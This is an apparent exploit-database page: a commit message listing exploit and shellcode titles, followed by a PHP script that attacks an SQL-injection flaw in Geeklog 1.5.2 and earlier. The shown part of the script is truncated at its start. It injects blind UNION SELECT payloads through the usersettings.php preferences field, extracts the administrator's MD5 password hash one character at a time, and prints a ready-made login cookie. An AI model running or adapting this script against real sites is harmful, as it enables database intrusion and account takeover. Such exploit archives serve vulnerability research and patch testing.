880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
97 lines
No EOL
3.2 KiB
PHP
97 lines
No EOL
3.2 KiB
PHP
source: https://www.securityfocus.com/bid/34553/info
|
|
|
|
Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Geeklog 1.5.2 and earlier are vulnerable.
|
|
|
|
tmp); $i++) {
|
|
$tmp_i = explode(";", $tmp[$i]);
|
|
$cookies .= $tmp_i[0]."; ";
|
|
}
|
|
if (stripos ($cookies, "\x70\x61\x73\x73\x77\x6f\x72\x64")) {
|
|
return $cookies;
|
|
} else {
|
|
die("[*] Unable to login!");
|
|
}
|
|
|
|
}
|
|
|
|
function xtrct_prefix() {
|
|
global $host, $port, $path, $cookies, $url;
|
|
$out = _s($url, $cookies, 0, "");
|
|
$tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
|
|
if (count($tmp) < 2) {
|
|
die("[!] Not logged in!");
|
|
}
|
|
$tmp = explode("\x22", $tmp[0]);
|
|
$prefix = $tmp[count($tmp)-1];
|
|
return $prefix;
|
|
}
|
|
|
|
function is_checked() {
|
|
global $host, $port, $path, $cookies, $url;
|
|
$out = _s($url, $cookies, 0, "");
|
|
$tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
|
|
$tmp = explode("\x3e", $tmp[1]);
|
|
$s = $tmp[0];
|
|
if (stripos ($s, "\x22\x63\x68\x65\x63\x6b\x65\x64\x22")) {
|
|
return 1;
|
|
} else {
|
|
return 0;
|
|
}
|
|
}
|
|
|
|
if (!$_use_ck) {
|
|
$cookies = login();
|
|
}
|
|
|
|
$url = "http://$host:$port".$path."usersettings.php";
|
|
$prefix = xtrct_prefix();
|
|
print "[*] prefix->'".$prefix."'\n";
|
|
|
|
if (!$_skiptest) {
|
|
run_test();
|
|
}
|
|
if ($_test) {
|
|
die;
|
|
}
|
|
|
|
#uncheck all boxes
|
|
$rst_sql = "0) AND 0 UNION SELECT 1,0x61646d696e5f626c6f636b FROM ".$prefix."users WHERE
|
|
".$where." LIMIT 1/*";
|
|
$out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
|
|
#then start extraction
|
|
$c = array();
|
|
$c = array_merge($c, range(0x30, 0x39));
|
|
$c = array_merge($c, range(0x61, 0x66));
|
|
$url = "http://$host:$port".$path;
|
|
$_hash = "";
|
|
print ("[*] Initiating hash extraction ...\n");
|
|
for ($j = 1; $j < 0x21; $j++) {
|
|
for ($i = 0; $i <= 0xff; $i++) {
|
|
$f = false;
|
|
if (in_array($i, $c)) {
|
|
$sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR
|
|
1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*";
|
|
$url = "http://$host:$port".$path."usersettings.php";
|
|
$out = _s($url, $cookies, 1,
|
|
"mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&");
|
|
if (is_checked()) {
|
|
$f = true;
|
|
$_hash .= chr($i);
|
|
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
|
|
#if found , uncheck again
|
|
$out = _s($url, $cookies, 1,
|
|
"mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
if ($f == false) {
|
|
die("\n[!] Unknown error ...");
|
|
}
|
|
}
|
|
print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n";
|
|
?>
|